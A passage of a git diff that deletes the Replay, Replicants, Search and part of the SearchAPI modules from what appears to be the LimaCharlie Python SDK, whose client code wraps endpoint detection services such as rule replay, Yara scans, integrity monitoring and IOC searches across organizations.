-                    'start_time' : 0 if startTime is None else startTime,
-                    'end_time' : 0 if endTime is None else endTime,
-                },
-                'events' : events,
-            },
-            'trace' : isRunTrace,
-            'limit_event' : 0 if limitEvent is None else limitEvent,
-            'limit_eval' : 0 if limitEval is None else limitEval,
-            'is_dry_run' : isDryRun,
-        }
-
-        if isStateful is not None:
-            req[ 'is_stateful' ] = isStateful
-
-        resp = self._lc._apiCall( '',
-                                  'POST',
-                                  {},
-                                  altRoot = 'https://%s/' % ( self._replayURL, ),
-                                  rawBody = json.dumps( req ).encode(),
-                                  contentType = 'application/json' )
-
-        return resp
-
-    def scanHistoricalSensor( self, sid, startTime, endTime, ruleName = None, namespace = None, ruleContent = None, isRunTrace = False, limitEvent = None, limitEval = None, isStateful = None, isDryRun = False, stream = 'event' ):
-        '''Scan a specific sensor's data with a D&R rule.
-
-        Args:
-            sid (str): sensor ID to scan.
-            startTime (int): seconds epoch to start scanning at.
-            endTime (int): seconds epoch to stop scanning at.
-            ruleName (str): the name of an existing D&R rule to use.
-            namespace (str): the namespace the ruleName lives in.
-            ruleContent (dict): D&R rule to use to scan, with a "detect" key and a "respond" key.
-            isRunTrace (bool): if True, generate a trace of the evaluation.
-            limitEvent (int): approximately limit the number of events evaluated.
-            limitEval (int): approximately limit the number of rule evaluations.
-            isIgnoreState (bool): if True, parallelize processing of single sensors to increase performance but limit effectiveness of stateful detection.
-            stream (str): data stream to replay.
-
-        Returns:
-            a dict containing results of the query.
-        '''
-
-        resp = self._scanHistoricalSensor( sid = sid, startTime = startTime, endTime = endTime, ruleName = ruleName, namespace = namespace, ruleContent = ruleContent, isRunTrace = isRunTrace, limitEvent = limitEvent, limitEval = limitEval, isStateful = isStateful, isDryRun = isDryRun, stream = stream )
-
-        return resp
-
-    def scanEntireOrg( self, startTime, endTime, ruleName = None, namespace = None, ruleContent = None, isRunTrace = False, limitEvent = None, limitEval = None, isStateful = None, isDryRun = False, stream = 'event' ):
-        '''Scan an entire organization's data with a D&R rule.
-
-        Args:
-            startTime (int): seconds epoch to start scanning at.
-            endTime (int): seconds epoch to stop scanning at.
-            ruleName (str): the name of an existing D&R rule to use.
-            namespace (str): the namespace the ruleName lives in.
-            ruleContent (dict): D&R rule to use to scan, with a "detect" key and a "respond" key.
-            isRunTrace (bool): if True, generate a trace of the evaluation.
-            limitEvent (int): approximately limit the number of events evaluated.
-            limitEval (int): approximately limit the number of rule evaluations.
-            isIgnoreState (bool): if True, parallelize processing of single sensors to increase performance but limit effectiveness of stateful detection.
-            stream (str): data stream to replay.
-
-        Returns:
-            a dict containing results of the query.
-        '''
-
-        resp = self._scanHistoricalSensor( startTime = startTime, endTime = endTime, ruleName = ruleName, namespace = namespace, ruleContent = ruleContent, isRunTrace = isRunTrace, limitEvent = limitEvent, limitEval = limitEval, isStateful = isStateful, isDryRun = isDryRun, stream = stream )
-
-        return resp
-
-    def scanEvents( self, events, ruleName = None, namespace = None, ruleContent = None, isRunTrace = False, limitEvent = None, limitEval = None, isDryRun = False, stream = 'event' ):
-        '''Scan the specific events with a D&R rule.
-
-        Args:
-            events (list): list of events to scan.
-            ruleName (str): the name of an existing D&R rule to use.
-            namespace (str): the namespace the ruleName lives in.
-            ruleContent (dict): D&R rule to use to scan, with a "detect" key and a "respond" key.
-            isRunTrace (bool): if True, generate a trace of the evaluation.
-            limitEvent (int): approximately limit the number of events evaluated.
-            limitEval (int): approximately limit the number of rule evaluations.
-            stream (str): data stream to replay.
-
-        Returns:
-            a dict containing results of the query.
-        '''
-
-        resp = self._scanHistoricalSensor( events = events, ruleName = ruleName, namespace = namespace, ruleContent = ruleContent, isRunTrace = isRunTrace, limitEvent = limitEvent, limitEval = limitEval, isDryRun = isDryRun, stream = stream )
-
-        return resp
-
-    def validateRule( self, ruleContent ):
-        '''Validate a D&R rule compiles properly.
-
-        Args:
-            ruleContent (dict): D&R rule to use to scan, with a "detect" key and a "respond" key.
-
-        Returns:
-            a dict containing results of the query.
-        '''
-
-        resp = self._scanHistoricalSensor( ruleContent = ruleContent, stream='event', events=[{'event':{},'routing':{}}] )
-
-        return resp
-
-def main( sourceArgs = None ):
-    import argparse
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie replay' )
-
-    parser.add_argument( '--sid',
-                         type = uuid.UUID,
-                         required = False,
-                         dest = 'sid',
-                         default = None,
-                         help = 'sensor id to scan traffic from.' )
-
-    parser.add_argument( '--entire-org',
-                         action = 'store_true',
-                         default = False,
-                         required = False,
-                         dest = 'isEntireOrg',
-                         help = 'if set and --sid is not set, replay traffic from entire organization.' )
-
-    parser.add_argument( '--start',
-                         type = int,
-                         required = False,
-                         dest = 'start',
-                         default = None,
-                         help = 'epoch seconds at which to start scanning sensor traffic.' )
-
-    parser.add_argument( '--end',
-                         type = int,
-                         required = False,
-                         dest = 'end',
-                         default = None,
-                         help = 'epoch seconds at which to end scanning sensor traffic.' )
-
-    parser.add_argument( '--events',
-                         type = str,
-                         required = False,
-                         dest = 'events',
-                         default = None,
-                         help = 'path to file containing events to use in evaluation.' )
-
-    parser.add_argument( '--rule-name',
-                         type = str,
-                         required = False,
-                         dest = 'ruleName',
-                         default = None,
-                         help = 'name of the an already-existing rule to scan with.' )
-
-    parser.add_argument( '--namespace',
-                         type = str,
-                         required = False,
-                         dest = 'namespace',
-                         default = None,
-                         help = 'namespace the rule-name lives in, like "general" or "managed".' )
-
-    parser.add_argument( '--rule-content',
-                         type = str,
-                         required = False,
-                         dest = 'ruleContent',
-                         default = None,
-                         help = 'file path where rule to scan is.' )
-
-    parser.add_argument( '--last-seconds',
-                         type = int,
-                         required = False,
-                         dest = 'lastSeconds',
-                         default = None,
-                         help = 'can be specified instead of --start and --end, will make the time window the last X seconds.' )
-
-    parser.add_argument( '--trace',
-                         action = 'store_true',
-                         default = False,
-                         required = False,
-                         dest = 'isRunTrace',
-                         help = 'if set will output a trace of each operator evaluation and the result' )
-
-    parser.add_argument( '--limit-event',
-                         type = int,
-                         required = False,
-                         dest = 'limitEvent',
-                         default = None,
-                         help = 'limits the number of events evaluated to approximately this number.' )
-
-    parser.add_argument( '--limit-eval',
-                         type = int,
-                         required = False,
-                         dest = 'limitEval',
-                         default = None,
-                         help = 'limits the number of rule evaluations to approximately this number.' )
-
-    parser.add_argument( '--validate',
-                         action = 'store_true',
-                         default = False,
-                         required = False,
-                         dest = 'isValidate',
-                         help = 'if set will only validate the rule compiles properly' )
-
-    parser.add_argument( '--ignore-state',
-                         action = 'store_false',
-                         default = None,
-                         required = False,
-                         dest = 'isStateful',
-                         help = 'if set, processing from single sensors will be parallelized increasing performance but limiting effectiveness of stateful detection. Auto-detect if not set.' )
-    parser.add_argument( '--enforce-state',
-                         action = 'store_true',
-                         default = None,
-                         required = False,
-                         dest = 'isStateful',
-                         help = 'if set, processing of rules will be serialized by sensor to enable stateful detection. Auto-detect if not set.' )
-    parser.add_argument( '--dry-run',
-                         action = 'store_true',
-                         default = None,
-                         required = False,
-                         dest = 'isDryRun',
-                         help = 'if set, the request will be simulated and the maximum number of evaluations expected will be returned.' )
-
-    parser.add_argument( '--stream',
-                         type = str,
-                         required = False,
-                         dest = 'stream',
-                         default = 'event',
-                         help = 'data stream to replay, like "event", "audit", "detect", defaults to "event".' )
-
-    args = parser.parse_args( sourceArgs )
-
-    replay = Replay( Manager() )
-
-    ruleContent = None
-    if args.ruleContent is not None:
-        with open( args.ruleContent, 'rb' ) as f:
-            ruleContent = f.read().decode()
-        try:
-            ruleContent = yaml.safe_load( ruleContent )
-        except:
-            try:
-                ruleContent = json.loads( ruleContent )
-            except:
-                raise LcApiException( 'rule content not valid yaml or json' )
-
-    if args.isValidate:
-        if ruleContent is None:
-            raise LcApiException( 'missing rule content to validate' )
-        response = replay.validateRule( ruleContent )
-    else:
-        if args.events is None:
-            if ( args.start is None or args.end is None ) and args.lastSeconds is None:
-                raise LcApiException( 'must specify start and end, or last-seconds' )
-
-            # We want to use Insight-based events.
-            start = args.start
-            end = args.end
-            if start is None and end is None and args.lastSeconds is not None:
-                now = int( time.time() )
-                start = now - args.lastSeconds
-                end = now
-
-            if args.sid is not None:
-                response = replay.scanHistoricalSensor( str( args.sid ),
-                                                        start,
-                                                        end,
-                                                        ruleName = args.ruleName,
-                                                        namespace = args.namespace,
-                                                        ruleContent = ruleContent,
-                                                        isRunTrace = args.isRunTrace,
-                                                        limitEvent = args.limitEvent,
-                                                        limitEval = args.limitEval,
-                                                        isStateful = args.isStateful,
-                                                        isDryRun = args.isDryRun,
-                                                        stream = args.stream )
-            elif args.isEntireOrg:
-                response = replay.scanEntireOrg( start,
-                                                 end,
-                                                 ruleName = args.ruleName,
-                                                 namespace = args.namespace,
-                                                 ruleContent = ruleContent,
-                                                 isRunTrace = args.isRunTrace,
-                                                 limitEvent = args.limitEvent,
-                                                 limitEval = args.limitEval,
-                                                 isStateful = args.isStateful,
-                                                 isDryRun = args.isDryRun,
-                                                 stream = args.stream )
-            else:
-                raise LcApiException( '--sid or --entire-org must be specified' )
-        else:
-            # We are using an events file.
-            with open( args.events, 'rb' ) as f:
-                fileContent = f.read().decode()
-            # We support two formats.
-            try:
-                try:
-                    # This is a JSON list containing all the events like you get
-                    # from the historical view download button. Or just single
-                    # JSON event.
-                    events = json.loads( fileContent )
-                except:
-                    # This is newline-delimited like you get from LC Outputs.
-                    events = [ json.loads( e ) for e in fileContent.split( '\n' ) ]
-
-                # If the result is a dictionary and not a list we assume this was
-                # just a single event so we will wrap it.
-                if isinstance( events, dict ):
-                    events = [ events ]
-            except:
-                print( "!!! Invalid events provided. Content should be a JSON event, a JSON LIST of events or newline-separated JSON." )
-                sys.exit( 1 )
-            response = replay.scanEvents( events,
-                                          ruleName = args.ruleName,
-                                          namespace = args.namespace,
-                                          ruleContent = ruleContent,
-                                          isRunTrace = args.isRunTrace,
-                                          limitEvent = args.limitEvent,
-                                          limitEval = args.limitEval,
-                                          isDryRun = args.isDryRun,
-                                          stream = args.stream )
-
-    print( json.dumps( response, indent = 2 ) )
-
-if '__main__' == __name__:
-    main()
diff --git a/limacharlie/Replicants.py b/limacharlie/Replicants.py
deleted file mode 100644
index bd2ad241..00000000
--- a/limacharlie/Replicants.py
+++ /dev/null
@@ -1,407 +0,0 @@
-from .Sensor import Sensor
-from .utils import LcApiException
-from .utils import _isStringCompat
-import json
-import yaml
-
-class _Replicant( object ):
-    def __init__( self, manager ):
-        self._manager = manager
-
-class Responder( _Replicant ):
-    '''Responder service manager object.'''
-
-    def sweep( self, sid ):
-        '''Perform a sweep of a given host.
-
-        Args:
-            sid (str): sensor ID to sweep.
-        '''
-
-        if isinstance( sid, Sensor ):
-            sid = sid.sid
-        return self._manager.replicantRequest( 'responder', {
-            'action' : 'sweep',
-            'sid' : sid,
-        }, True )
-
-class Yara( _Replicant ):
-    '''Yara service manager object.'''
-
-    def scan( self, sid, sources ):
-        '''Perform an ad-hoc scan of a sensor with Yara signatures.
-
-        Args:
-            sid (str): sensor ID to scan.
-            sources (list of str): list of source Yara signature names to use in the scan.
-        '''
-
-        if isinstance( sid, Sensor ):
-            sid = sid.sid
-        return self._manager.replicantRequest( 'yara', {
-            'action' : 'scan',
-            'sid' : sid,
-            'sources' : sources,
-        }, True )
-
-    def getRules( self ):
-        '''Get the constant Yara scanning rules in effect.
-
-        Returns:
-            Dict of rules.
-        '''
-
-        return self._manager.replicantRequest( 'yara', {
-            'action' : 'list_rules',
-        }, False )
-
-    def getSources( self ):
-        '''Get the Yara signature sources.
-
-        Returns:
-            Dict of sources.
-        '''
-
-        return self._manager.replicantRequest( 'yara', {
-            'action' : 'list_sources',
-        }, False )
-
-    def getSource( self, sourceName ):
-        '''Get the content of a Yara signature source.
-
-        Args:
-            sourceName (str): name of the source to get.
-
-        Returns:
-            Source content.
-        '''
-
-        return self._manager.replicantRequest( 'yara', {
-            'action' : 'get_source',
-            'source' : sourceName,
-        }, False ).get( 'content', None )
-
-    def addRule( self, ruleName, sources = [], tags = [], platforms = [] ):
-        '''Add a constant Yara scanning rule.
-
-        Args:
-            ruleName (str): name of the rule to add.
-            sources (list of str): list of sources this rule should scan with.
-            tags (list of str): list of tags sensors must posses for this rule to apply.
-            platforms (list of str): list of platform names this rule applies to.
-        '''
-
-        return self._manager.replicantRequest( 'yara', {
-            'action' : 'add_rule',
-            'name' : ruleName,
-            'sources' : sources,
-            'tags' : tags,
-            'platforms' : platforms,
-        }, False )
-
-    def removeRule( self, ruleName ):
-        '''Remove a constant Yara scanning rule.
-
-        Args:
-            ruleName (str): name of the rule to remove.
-        '''
-
-        return self._manager.replicantRequest( 'yara', {
-            'action' : 'remove_rule',
-            'name' : ruleName,
-        }, False )
-
-    def addSource( self, sourceName, source ):
-        '''Add a Yara signature source.
-
-        Args:
-            sourceName (str): name of the source to add.
-            source (str): source URL for the Yara signature(s).
-        '''
-
-        return self._manager.replicantRequest( 'yara', {
-            'action' : 'add_source',
-            'name' : sourceName,
-            'source' : source,
-        }, False )
-
-    def removeSource( self, sourceName ):
-        '''Remove a Yara rule source.
-
-        Args:
-            sourceName (str): name of the source to remove.
-        '''
-
-        return self._manager.replicantRequest( 'yara', {
-            'action' : 'remove_source',
-            'name' : sourceName,
-        }, False )
-
-class Integrity( _Replicant ):
-    '''File and Registry Integrity Monitoring (FIM) service manager object.'''
-
-    def getRules( self ):
-        '''Get FIM rules in effect.
-
-        Returns:
-            Dict of rules.
-        '''
-
-        return self._manager.replicantRequest( 'integrity', {
-            'action' : 'list_rules',
-        }, False )
-
-    def addRule( self, ruleName, patterns = [], tags = [], platforms = [] ):
-        '''Add an FIM rule.
-
-        Args:
-            ruleName (str): name of the rule to add.
-            patterns (list of str): list of file/registry patterns to monitor.
-            tags (list of str): list of tags sensors must posses for this rule to apply.
-            platforms (list of str): list of platform names this rule applies to.
-        '''
-
-        return self._manager.replicantRequest( 'integrity', {
-            'action' : 'add_rule',
-            'name' : ruleName,
-            'patterns' : patterns,
-            'tags' : tags,
-            'platforms' : platforms,
-        }, False )
-
-    def removeRule( self, ruleName ):
-        '''Remove an FIM rule.
-
-        Args:
-            ruleName (str): name of the rule to remove.
-        '''
-
-        return self._manager.replicantRequest( 'integrity', {
-            'action' : 'remove_rule',
-            'name' : ruleName,
-        }, False )
-
-class Logging( _Replicant ):
-    '''Logging service manager object.'''
-
-    def getRules( self ):
-        '''Get the Log collection rules in effect.
-        '''
-
-        return self._manager.replicantRequest( 'logging', {
-            'action' : 'list_rules',
-        }, False )
-
-    def addRule( self, ruleName, patterns = [], tags = [], platforms = [], isDeleteAfter = False, isIgnoreCert = False, daysRetention = 0 ):
-        '''Add a Log collection rule.
-
-        Args:
-            ruleName (str): name of the rule to add.
-            patterns (list of str): list of file patterns describing Logs to monitor and retrieve.
-            tags (list of str): list of tags sensors must posses for this rule to apply.
-            platforms (list of str): list of platform names this rule applies to.
-            isDeleteAfter (bool): if True, delete the Log after retrieval.
-            isIgnoreCert (bool): if True, sensor ignores SSL cert errors during log upload.
-        '''
-
-        return self._manager.replicantRequest( 'logging', {
-            'action' : 'add_rule',
-            'name' : ruleName,
-            'patterns' : patterns,
-            'is_delete_after' : isDeleteAfter,
-            'is_ignore_cert' : isIgnoreCert,
-            'days_retention' : daysRetention,
-            'tags' : tags,
-            'platforms' : platforms,
-        }, False )
-
-    def removeRule( self, ruleName ):
-        '''Remove a Log collection rule.
-
-        Args:
-            ruleName (str): name of the rule to remove.
-        '''
-
-        return self._manager.replicantRequest( 'logging', {
-            'action' : 'remove_rule',
-            'name' : ruleName,
-        }, False )
-
-class Replay( _Replicant ):
-    '''Replay service manager object.'''
-
-    def runJob( self, startTime, endTime, sid = None, ruleName = None, ruleContent = None ):
-        '''Run a Replay service job.
-
-        Args:
-            startTime (int): epoch start time to replay.
-            endTime (int): epoch end time to replay.
-            sid (str): sensor ID to replay the data from.
-            ruleName (str): optional name of an existing D&R rule to replay.
-            ruleContent (dict): optional content of a D&R rule to replay.
-        '''
-
-        if isinstance( sid, Sensor ):
-            sid = sid.sid
-        req = {
-            'action' : 'replay',
-            'start' : startTime,
-            'end' : endTime,
-        }
-        if sid is not None:
-            req[ 'sid' ] = sid
-        if ruleName is not None:
-            req[ 'rule_name' ] = ruleName
-        if ruleContent is not None:
-            if _isStringCompat( ruleContent ):
-                try:
-                    ruleContent = yaml.safeLoad( ruleContent )
-                except:
-                    try:
-                        ruleContent = json.loads( ruleContent )
-                    except:
-                        raise LcApiException( 'rule content not JSON and not YAML' )
-            req[ 'rule_content' ] = ruleContent
-        return self._manager.replicantRequest( 'replay', req, True )
-
-class Exfil( _Replicant ):
-    '''Exfil control service manager object.'''
-
-    def getRules( self ):
-        '''Get the exfil rules in effect.
-
-        Returns:
-            Dict of rules.
-        '''
-
-        return self._manager.replicantRequest( 'exfil', {
-            'action' : 'list_rules',
-        }, False )
-
-    def addEventRule( self, ruleName, events = [], tags = [], platforms = [] ):
-        '''Add an event rule describing events sent to the cloud in real-time.
-
-        Args:
-            ruleName (str): name of the rule to add.
-            events (list of str): list of event names to send in real-time.
-            tags (list of str): list of tags sensors must posses for this rule to apply.
-            platforms (list of str): list of platform names this applies to.
-        '''
-
-        return self._manager.replicantRequest( 'exfil', {
-            'action' : 'add_event_rule',
-            'name' : ruleName,
-            'events' : events,
-            'tags' : tags,
-            'platforms' : platforms,
-        }, False )
-
-    def removeEventRule( self, ruleName ):
-        '''Remove an event rule.
-
-        Args:
-            ruleName (str): name of the rule to remove.
-        '''
-
-        return self._manager.replicantRequest( 'exfil', {
-            'action' : 'remove_event_rule',
-            'name' : ruleName,
-        }, False )
-
-    def addWatchRule( self, ruleName, event, operator, value, path = [], tags = [], platforms = [] ):
-        '''Add a watch rule to send matching events to the cloud in real-time.
-
-        Args:
-            ruleName (str): name of the watch rule to add.
-            event (str): name of the event this rule applies to.
-            operator (str): comparison operator name to determine match.
-            value (str): value to compare to for matching.
-            path (list of str): path within the event to compare the value of, without a leading "event".
-            tags (list of str): list of tags sensors must posses for this rule to apply.
-            platforms (list of str): list of platform names this applies to.
-        '''
-
-        return self._manager.replicantRequest( 'exfil', {
-            'action' : 'add_watch',
-            'name' : ruleName,
-            'operator' : operator,
-            'event' : event,
-            'value' : value,
-            'path' : path,
-            'tags' : tags,
-            'platforms' : platforms,
-        }, False )
-
-    def removeWatchRule( self, ruleName ):
-        '''Remove a watch rule.
-
-        Args:
-            ruleName (str): name of the rule to remove.
-        '''
-
-        return self._manager.replicantRequest( 'exfil', {
-            'action' : 'remove_watch',
-            'name' : ruleName,
-        }, False )
-
-class Dumper( _Replicant ):
-    '''Memory dumper service object.'''
-
-    def dump( self, sid ):
-        '''Dump the full memory of a given host.
-
-        Args:
-            sid (str): sensor ID to sweep.
-        '''
-
-        if isinstance( sid, Sensor ):
-            sid = sid.sid
-        return self._manager.replicantRequest( 'dumper', {
-            'sid' : sid,
-        }, True )
-
-class ReliableTasking( _Replicant ):
-    '''Reliable Tasking service object.'''
-
-    def task( self, task, sid = None, tag = None, ttl = None ):
-        '''Issue a task for a set of sensors even if offline.
-
-        Args:
-            task (str): actual task command line to send.
-            sid (str): optional sensor ID to task or '*' for all.
-            tag (str): optional tag to select sensors to send the task to.
-            ttl (int): optional number of seconds before unsent tasks expire, defaults to a week.
-        '''
-
-        req = {
-            'action' : 'task',
-            'task' : task,
-        }
-        if sid is not None:
-            if isinstance( sid, Sensor ):
-                sid = sid.sid
-            req[ 'sid' ] = sid
-        if tag is not None:
-            req[ 'tag' ] = tag
-        if ttl is not None:
-            req[ 'ttl' ] = ttl
-        return self._manager.replicantRequest( 'reliable-tasking', req, True )
-
-    def getTasks( self, sid = None, tag = None ):
-        '''Issue a task for a set of sensors even if offline.
-
-        Args:
-            sid (str): optional sensor ID to get the tasks for or '*' for all.
-            tag (str): optional tag to select sensors to get the tasks for.
-        '''
-
-        req = {
-            'action' : 'list',
-        }
-        if sid is not None:
-            if isinstance( sid, Sensor ):
-                sid = sid.sid
-            req[ 'sid' ] = sid
-        if tag is not None:
-            req[ 'tag' ] = tag
-        return self._manager.replicantRequest( 'reliable-tasking', req, False )
\ No newline at end of file
diff --git a/limacharlie/Search.py b/limacharlie/Search.py
deleted file mode 100644
index 64fdcc3e..00000000
--- a/limacharlie/Search.py
+++ /dev/null
@@ -1,233 +0,0 @@
-from limacharlie import Manager
-
-# Detect if this is Python 2 or 3
-import sys
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-if _IS_PYTHON_2:
-    from Queue import Queue
-else:
-    from queue import Queue
-
-import threading
-import os.path
-import yaml
-import traceback
-import functools
-
-from .constants import CONFIG_FILE_PATH
-
-validIOCs = (
-    'file_hash',
-    'file_name',
-    'file_path',
-    'ip', 
-    'domain',
-    'user',
-    'service_name',
-    'package_name'
-)
-
-class Search( object ):
-    '''Helper object to perform cross-organization IOC searches.'''
-
-    def __init__( self, environments = None, output = '-' ):
-        '''Create a Search object specifying which environments to search.
-
-        Args:
-            environments (list of str): optional list of specific environment names to search.
-            output (str): optional file path where to output results.
-        '''
-
-        self._environmentsToQuery = {}
-        with open( CONFIG_FILE_PATH, 'rb' ) as f:
-            conf = yaml.safe_load( f.read().decode() )
-            if 'oid' in conf and 'api_key' in conf and conf.get( 'env', {} ).get( 'default', None ) is None:
-                conf.setdefault( 'env', {} )[ 'default' ] = {
-                    'oid' : conf[ 'oid' ],
-                    'api_key' : conf[ 'api_key' ]
-                }
-            if 0 != len( environments ):
-                for envName in environments:
-                    envConf = conf.get( 'env', {} ).get( envName, None )
-                    if envConf is None:
-                        raise Exception( 'environment %s not found' % ( envName, ) )
-                    self._environmentsToQuery[ envName ] = envConf
-            else:
-                self._environmentsToQuery = conf.get( 'env', {} )
-                if 'oid' in conf and 'api_key' in conf:
-                    self._environmentsToQuery[ 'default' ] = {
-                        'oid' : conf[ 'oid' ],
-                        'api_key' : conf[ 'api_key' ]
-                    }
-
-        if '-' == output:
-            self._output = None
-        else:
-            self._output = open( output, 'wb' )
-
-        self._mutex = threading.Lock()
-
-    def getNumEnvironments( self ):
-        return len( self._environmentsToQuery )
-
-    def query( self, iocType, iocName, info, isCaseInsensitive = False, isWithWildcards = False, limit = None, isPerIoc = False ):
-        '''Performa a search.
-
-        Args:
-            iocType (str): type of IOC to search for.
-            iocName (str): name of the IOC to search for.
-            info (str): information type to retrieve.
-            isCaseInsensitive (bool): if True, search for IOC in a case insensitive way.
-            isWithWildcards (bool): if True, use "%" as a wildcard in the IOC name.
-            limit (int): optional maximum number of sensors/logs to report about, otherwise defaults to internal LimaCharlie limit.
-            isPerIoc (bool): if the search has wildcards, return results grouped per individual ioc.
-
-        Returns:
-            Dict of requested information.
-        '''
-
-        threads = []
-
-        results = Queue()
-
-        for envName, env in self._environmentsToQuery.items():
-            t = threading.Thread( target = self._queryThread, args = ( results, envName, env, iocType, iocName, info, isCaseInsensitive, isWithWildcards, limit, isPerIoc ) )
-            threads.append( t )
-            t.start()
-
-        for t in threads:
-            t.join( timeout = 60 )
-
-        outputs = []
-        while True:
-            try:
-                outputs.append( results.get_nowait() )
-            except:
-                break
-
-        if self._output is None:
-            for result in outputs:
-                self._safePrint( "\n%s (%s)\n=========================================\n%s" % ( result[ 'env' ], result[ 'oid' ], yaml.safe_dump( result[ 'result' ], default_flow_style = False ) ) )
-        else:
-            self._output.write( yaml.safe_dump( outputs, default_flow_style = False ).encode() )
-
-        self._safePrint( "Done, %s results." % ( functools.reduce( lambda x, y: x + ( len( y[ 'result' ] ) if info != 'summary' else 1 ), outputs, 0 ) ) )
-
-    def _queryThread( self, results, envName, env, iocType, iocName, info, isCaseInsensitive, isWithWildcards, limit, isPerIoc ):
-        try:
-            # If using a user API key, pass the uid parameter from the env var
-            try:
-                lc = Manager( env[ 'oid' ], env[ 'api_key' ], uid=env['uid'] )
-            except:
-                lc = Manager( env[ 'oid' ], env[ 'api_key' ] )
-                
-            try:
-                isInsightEnabled = lc.isInsightEnabled()
-            except:
-                isInsightEnabled = False
-            if not isInsightEnabled:
-                self._safePrint( "Skipping %s (%s) as Insight is not enabled." % ( envName, env[ 'oid' ], ) )
-                return
-
-            result = lc.getObjectInformation(
-                iocType,
-                iocName,
-                info,
-                isCaseSensitive = not isCaseInsensitive,
-                isWithWildcards = isWithWildcards,
-                limit = limit,
-                isPerObject = isPerIoc
-            )
-
-            if result and 0 != len( result ):
-                results.put( { 'env' : envName, 'oid' : env[ 'oid' ], 'result' : result } )
-        except:
-            self._safePrint( traceback.format_exc() )
-
-    def _safePrint( self, msg ):
-        with self._mutex:
-            print( msg )
-
-def main( sourceArgs = None ):
-    import argparse
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie search' )
-    parser.add_argument( '-t', '--type',
-                         type = str,
-                         required = True,
-                         dest = 'type',
-                         help = 'the IOC type to search for, one of: %s.' % ( ", ".join( validIOCs ) ) )
-
-    parser.add_argument( '-o', '--ioc',
-                         type = str,
-                         required = True,
-                         dest = 'ioc',
-                         help = 'the value of the IOC to search for' )
-
-    parser.add_argument( '-i', '--info',
-                         type = str,
-                         required = False,
-                         dest = 'info',
-                         default = 'summary',
-                         help = 'the type of information to return, one of "summary" or "locations", "summary" is default.' )
-
-    parser.add_argument( '--case-insensitive',
-                         action = 'store_true',
-                         default = False,
-                         required = False,
-                         dest = 'is_case_insensitive',
-                         help = 'make the search case insensitive.' )
-
-    parser.add_argument( '--with-wildcards',
-                         action = 'store_true',
-                         default = False,
-                         required = False,
-                         dest = 'is_with_wildcards',
-                         help = 'make the search using the "%%" wildcard.' )
-
-    parser.add_argument( '-e', '--environments',
-                         type = str,
-                         required = False,
-                         dest = 'environments',
-                         default = [],
-                         nargs = '*',
-                         help = 'the name of the LimaCharlie environments (as defined in ~/.limacharlie) to use, otherwise all environments are used.' )
-
-    parser.add_argument( '--output',
-                         type = str,
-                         required = False,
-                         dest = 'output',
-                         default = '-',
-                         help = 'location where to send output, "-" by default outputs human readable to stdout, otherwise it should be a file where YAML will be written to.' )
-
-    parser.add_argument( '-l', '--limit',
-                         type = int,
-                         required = False,
-                         dest = 'limit',
-                         help = 'optional maximum number of sensors/logs to report about, otherwise defaults to internal LimaCharlie limit.' )
-
-    parser.add_argument( '--per-ioc',
-                         action = 'store_true',
-                         default = False,
-                         required = False,
-                         dest = 'is_per_ioc',
-                         help = 'if the search has wildcards, return results grouped per individual ioc.' )
-
-    args = parser.parse_args( sourceArgs )
-
-    search = Search( environments = args.environments, output = args.output )
-
-    print( "Querying %s environments for %s (%s) to %s." % ( search.getNumEnvironments(), args.ioc, args.type, args.output ) )
-
-    _ = search.query(
-        args.type,
-        args.ioc,
-        args.info,
-        isCaseInsensitive = args.is_case_insensitive,
-        isWithWildcards = args.is_with_wildcards,
-        limit = args.limit,
-        isPerIoc = args.is_per_ioc,
-    )
\ No newline at end of file
diff --git a/limacharlie/SearchAPI.py b/limacharlie/SearchAPI.py
deleted file mode 100644
index 4a2c861e..00000000
--- a/limacharlie/SearchAPI.py
+++ /dev/null
@@ -1,573 +0,0 @@
-from limacharlie import Manager
-from limacharlie.time_utils import parse_time_input, format_timestamp
-import sys
-import json
-import time
-import csv
-import os
-import signal
-
-
-# Global state for signal handling
-class SearchState:
-    def __init__(self):
-        self.manager = None
-        self.query_id = None
-        self.interrupted = False
-
-    def cancel_search(self):
-        '''Cancel the current search if one is running.'''
-        if self.query_id and self.manager:
-            try:
-                print( "\n\nCanceling search query...", file = sys.stderr )
-                self.manager.cancelSearch( self.query_id )
-                print( "Search query canceled.", file = sys.stderr )
-            except Exception as e:
-                print( "Error canceling search: %s" % ( e, ), file = sys.stderr )
-
-_search_state = SearchState()
-
-def _signal_handler(signum, frame):
-    '''Handle SIGINT (Ctrl+C) by canceling the running search.'''
-    _search_state.interrupted = True
-    _search_state.cancel_search()
-    sys.exit( 130 )  # 128 + SIGINT (2)
-
-def flatten_dict(d, parent_key='', sep='/'):
-    """
-    Recursively flatten a nested dictionary for CSV export.
-
-    Parameters:
-        d (dict): Dictionary to flatten.
-        parent_key (str): Parent key for nested keys.
-        sep (str): Separator for nested keys.
-
-    Return:
-        dict: Flattened dictionary with string values.
-    """
-    items = []
-    for k, v in d.items():
-        new_key = f"{parent_key}{sep}{k}" if parent_key else k
-
-        if isinstance(v, dict):
-            # Recursively flatten nested dicts
-            items.extend(flatten_dict(v, new_key, sep=sep).items())
-        elif isinstance(v, list):
-            # Convert lists to JSON strings
-            items.append((new_key, json.dumps(v)))
-        else:
-            # Convert all values to strings for CSV compatibility
-            items.append((new_key, str(v) if v is not None else ''))
-
-    return dict(items)
-
-
-def format_duration(seconds):
-    """
-    Format a duration in seconds to a human-readable string.
-
-    Parameters:
-        seconds (float): Duration in seconds.
-
-    Return:
-        str: Formatted duration string (e.g., "1h 23m", "45s").
-    """
-    if seconds < 60:
-        return "%ds" % int(seconds)
-    elif seconds < 3600:
-        return "%dm %ds" % (int(seconds / 60), int(seconds % 60))
-    else:
-        hours = int(seconds / 3600)
-        minutes = int((seconds % 3600) / 60)
-        return "%dh %dm" % (hours, minutes)
-
-
-def format_time_range(seconds):
-    """
-    Format a time range in seconds to a compact string.
-
-    Parameters:
-        seconds (int): Time range in seconds.
-
-    Return:
-        str: Formatted time range string (e.g., "7d", "24h", "30m").
-    """
-    if seconds < 60:
-        return "%ds" % int(seconds)
-    elif seconds < 3600:
-        return "%dm" % int(seconds / 60)
-    elif seconds < 86400:
-        return "%dh" % int(seconds / 3600)
-    else:
-        return "%dd" % int(seconds / 86400)
-
-
-def print_statistics(total_time, poll_count, page_count, event_row_count, facet_count, timeline_count, include_facets, include_timeline):
-    """
-    Print execution statistics to stderr.
-
-    Parameters:
-        total_time (float): Total execution time in seconds.
